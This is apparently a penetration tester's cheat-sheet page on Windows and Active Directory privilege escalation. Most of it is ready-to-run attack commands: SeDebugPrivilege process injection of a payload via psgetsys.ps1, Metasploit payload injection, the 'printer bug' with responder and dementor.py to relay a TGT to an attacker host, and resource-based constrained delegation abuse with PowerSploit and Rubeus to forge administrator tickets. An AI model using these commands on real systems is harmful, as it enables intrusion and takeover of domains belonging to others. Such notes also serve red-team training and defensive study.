Privilege Escalation
The adversary is trying to gain higher-level permissions. https://attack.mitre.org/tactics/TA0004/
Process Elevation (via SeDebugPrivilege)
If you run whoami /priv
and you see SeDebugPrivilege
set to Enabled
, you can assume you already have SYSTEM. One way of doing it, is using decoder's psgetsys.ps1
script once you have a good idea on a PID to inject:
. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864, 'C:\temp\payload.exe');
You can also gain a MSF session and use the module windows/manage/payload_inject
with a PID of your choice.
Attacking spoolss ("The Printer Bug")
From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to cause a TGT relay from the target host to us running responder, so we can generate a TGS for any user on that target host:
## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123
## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.local' 10.10.15.123 10.10.10.123
GenericWrite to Host + User SPN = PWN
If we have GenericWrite
privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity
property against the AD object user PowerSploit and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path
## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};
## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;
Last updated